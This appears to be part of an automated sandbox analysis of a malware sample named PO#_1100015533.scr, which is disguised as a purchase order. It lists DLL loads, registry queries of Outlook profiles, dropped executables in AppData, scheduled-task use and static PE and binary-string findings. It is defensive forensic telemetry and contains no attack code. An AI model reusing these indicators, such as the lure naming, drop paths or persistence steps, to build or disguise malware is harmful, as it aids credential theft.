Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: webengine4.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: version.dll
Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: ehtrace.dll
Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: slc.dll
Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: winhttp.dll
Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: webio.dll
Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: mpr.dll
Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: secur32.dll
Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: dnsapi.dll
Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: ehetw.dll
Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: ntmarta.dll
Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: cryptsp.dll
Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: winmm.dll
Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: msdmo.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: winnsi.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: wevtapi.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: ssdpapi.dll
                  Source: C:\Windows\ehome\ehsched.exeSection loaded: slc.dll
                  Source: C:\Windows\ehome\ehsched.exeSection loaded: winhttp.dll
                  Source: C:\Windows\ehome\ehsched.exeSection loaded: webio.dll
                  Source: C:\Windows\ehome\ehsched.exeSection loaded: mpr.dll
                  Source: C:\Windows\ehome\ehsched.exeSection loaded: secur32.dll
                  Source: C:\Windows\ehome\ehsched.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\ehome\ehsched.exeSection loaded: ehetw.dll
                  Source: C:\Windows\ehome\ehsched.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\ehome\ehsched.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\ehome\ehsched.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: pcwum.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\ieetwcollector.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\ieetwcollector.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\ieetwcollector.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\ieetwcollector.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\ieetwcollector.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\ieetwcollector.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\ieetwcollector.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\ieetwcollector.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: wow64win.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: wow64cpu.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: webio.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: cryptdll.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: version.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: credssp.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: webio.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: wow64win.dll
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: wow64cpu.dll
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: bcrypt.dll
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: osuninst.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: vdsutil.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: netapi32.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ulib.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ifsutil.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: vssapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: netapi32.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: virtdisk.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: fltlib.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: cryptdll.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: fveapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: tbs.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: fvecerts.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: logoncli.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: cscapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: rpcrtremote.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: wow64win.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: wow64cpu.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: webio.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: bcrypt.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: credssp.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: rpcrtremote.dll
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
                  Source: apihost.exe.lnk.12.drLNK file: ..\..\..\..\..\ACCApi\apihost.exe
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: PO#_1100015533.scrStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: PO#_1100015533.scrStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: PO#_1100015533.scrStatic file information: File size 1538560 > 1048576
                  Source: PO#_1100015533.scrStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x176200
                  Source: PO#_1100015533.scrStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: msiexec.pdb source: armsvc.exe, 0000000B.00000003.435423769.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.435188760.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe.11.dr
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\ktab_objs\ktab.pdb source: armsvc.exe, 0000000B.00000003.528121560.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\setupexe\x64\ship\0\setup.pdbx64\ship\0\setup.exe\bbtopt\setupO.pdb source: armsvc.exe, 0000000B.00000003.517297171.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\klist_objs\klist.pdb source: armsvc.exe, 0000000B.00000003.527912305.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\worksconv\x86\ship\0\wkconv.pdb source: armsvc.exe, 0000000B.00000003.577175995.0000000002220000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: vssvc.pdb source: armsvc.exe, 0000000B.00000003.456410377.0000000002500000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.464565627.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, VSSVC.exe.11.dr
                  Source: Binary string: t:\misc_hev\x86\ship\0\msohtmed.pdb\ship\0\msohtmed.exe\bbtopt\msohtmedO.pdb source: armsvc.exe, 0000000B.00000003.585848853.00000000019E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: sppsvc.pdb source: armsvc.exe, 0000000B.00000003.445848653.0000000002570000.00000004.00001000.00020000.00000000.sdmp, sppsvc.exe.11.dr
                  Source: Binary string: PresentationFontCache.pdb source: armsvc.exe, 0000000B.00000003.421750632.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msiexec.pdbE3 source: armsvc.exe, 0000000B.00000003.435423769.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.435188760.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe.11.dr
                  Source: Binary string: aspnet_state.pdb source: armsvc.exe, 0000000B.00000003.382154090.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, aspnet_state.exe.11.dr
                  Source: Binary string: _.pdb source: PO#_1100015533.scr, 00000008.00000002.393446054.0000000002950000.00000004.08000000.00040000.00000000.sdmp, PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FA4000.00000004.00000800.00020000.00000000.sdmp, PO#_1100015533.scr, 00000008.00000002.393542161.0000000002AD3000.00000004.00000020.00020000.00000000.sdmp, hVVSnrrP.exe, 00000035.00000002.614225292.0000000003F13000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\servertool_objs\servertool.pdb source: armsvc.exe, 0000000B.00000003.530679334.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: FXSSVC.pdb source: armsvc.exe, 0000000B.00000003.418018700.0000000002220000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.418338317.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdb@SH source: armsvc.exe, 0000000B.00000003.444842807.0000000001F40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444694493.0000000001EB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.445682403.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444714229.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444889546.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444863016.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444876161.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444772908.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.445599387.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\worksconv\x86\ship\0\wkconv.pdb86\ship\0\wkconv.exe\bbtopt\wkconvO.pdb source: armsvc.exe, 0000000B.00000003.577175995.0000000002220000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 0000000B.00000003.488416552.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ehSched.pdb source: armsvc.exe, 0000000B.00000003.416561300.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mscorsvw.pdbD source: armsvc.exe, 0000000B.00000003.393419599.0000000001B70000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.389710168.0000000001EE0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: locator.pdb@SH source: armsvc.exe, 0000000B.00000003.444541638.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.443059564.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.443304404.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: locator.pdb source: armsvc.exe, 0000000B.00000003.444541638.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.443059564.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.443304404.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msdtcexe.pdbE3 source: armsvc.exe, 0000000B.00000003.430102360.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.429418798.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, msdtc.exe.11.dr
                  Source: Binary string: x64\ship\0\setup.exe\bbtopt\setupO.pdb source: armsvc.exe, 0000000B.00000003.517297171.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\jjs_objs\jjs.pdb source: armsvc.exe, 0000000B.00000003.527378625.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\pack200_objs\pack200.pdb source: armsvc.exe, 0000000B.00000003.528425595.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: vds.pdb source: armsvc.exe, 0000000B.00000003.453316185.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.449463705.0000000002220000.00000004.00001000.00020000.00000000.sdmp, vds.exe.11.dr
